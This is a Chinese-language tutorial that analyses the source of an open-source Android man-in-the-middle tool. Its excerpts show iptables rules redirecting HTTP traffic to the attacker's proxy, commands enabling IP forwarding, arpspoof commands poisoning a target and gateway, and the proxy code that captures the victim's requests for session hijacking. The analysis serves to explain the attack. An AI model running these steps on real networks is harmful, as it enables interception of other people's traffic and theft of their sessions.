Android 中間人攻擊

Android 中間人攻擊

0x00

Android中間人攻擊的思路就是劫持區域網路中被攻擊機器和伺服器間的對話。被攻擊機器和伺服器表面上工作正常，實際上已經被中間人劫持。可以從一張圖來明白這個過程。

受攻擊主機發送的資料，首先經過了攻擊者，從伺服器返回的資料也經過攻擊者，再發送給受攻擊主機。

0x01

Android開源中間人攻擊例子，請參考https://github.com/ssun125/Lanmitm。我們這裡主要分析這個連結中效果預覽中工作階段劫持的原理。

分析https://github.com/ssun125/Lanmitm原始碼，要實現arp欺騙，有關鍵的四步：

1、使用Iptables進行NAT資料包轉寄

public static final String[] PORT_REDIRECT_CMD = {"iptables -t nat -F","iptables -F","iptables -t nat -I POSTROUTING -s 0/0 -j MASQUERADE","iptables -P FORWARD ACCEPT","iptables -t nat -A PREROUTING -j DNAT -p tcp --dport 80 --to "+ AppContext.getIp() + ":" + HttpProxy.HTTP_PROXY_PORT };

這個命令是在ProxyService類的startHttpProxy方法中調用的。

 

 

2、開啟連接埠轉寄，允許本機像路由器那樣轉寄資料包

 

private String[] FORWARD_COMMANDS = { "echo 1 > /proc/sys/net/ipv4/ip_forward","echo 1 > /proc/sys/net/ipv6/conf/all/forwarding" };

這個是在ArpService類的onStartCommand方法中調用的。

3、ARP投毒

 

if ((ONE_WAY_HOST & arp_cheat_way) != 0) {if (target_ip == null)target_ip = AppContext.getTarget().getIp();if (!target_ip.equals(AppContext.getGateway()))arp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName+ " -t " + target_ip + " "+ AppContext.getGateway();elsearp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName+ " -t " + AppContext.getGateway() + " "+ target_ip;arpSpoof = new Thread() {@Overridepublic void run() {ShellUtils.execCommand(arp_spoof_cmd, true, false);}};arpSpoof.start();}if ((ONE_WAY_ROUTE & arp_cheat_way) != 0) {arp_spoof_recv_cmd = getFilesDir() + "/arpspoof -i " + interfaceName+ " -t " + AppContext.getGateway() + " "+ AppContext.getIp();arpSpoofRecv = new Thread() {@Overridepublic void run() {ShellUtils.execCommand(arp_spoof_recv_cmd, true, false);}};arpSpoofRecv.start();}

這個是在ArpService類的onStartCommand方法中調用的。

4、在攻擊者機器根據Socket原理，建立一個WebServer，原理類似於使用NanoHttpd實現簡易WebServer。這樣被攻擊者發送給攻擊者的請求就能被擷取，並且顯示在介面上。

核心的代碼如下：

 

public class HttpProxy extends Thread {......@Overridepublic void run() {try {mServerSocket = new ServerSocket();mServerSocket.setReuseAddress(true);mServerSocket.bind(new InetSocketAddress(AppContext.getInetAddress(),HTTP_PROXY_PORT), BACKLOG);executor = Executors.newCachedThreadPool();while (!stop) {Socket client = mServerSocket.accept();DealThread dealThread = null;switch (mProxyMode) {case MODE_PROXY_SIMPLE:dealThread = new SimpleDealThread(client,mOnRequestListener);break;case MODE_PROXY_DEEP:dealThread = new DeepDealThread(client, mOnRequestListener);break;}executor.execute(dealThread);}} catch (IOException e) {e.printStackTrace();} finally {if (mServerSocket != null) {try {mServerSocket.close();} catch (IOException e) {e.printStackTrace();}}if (executor != null) {executor.shutdownNow();}}}......}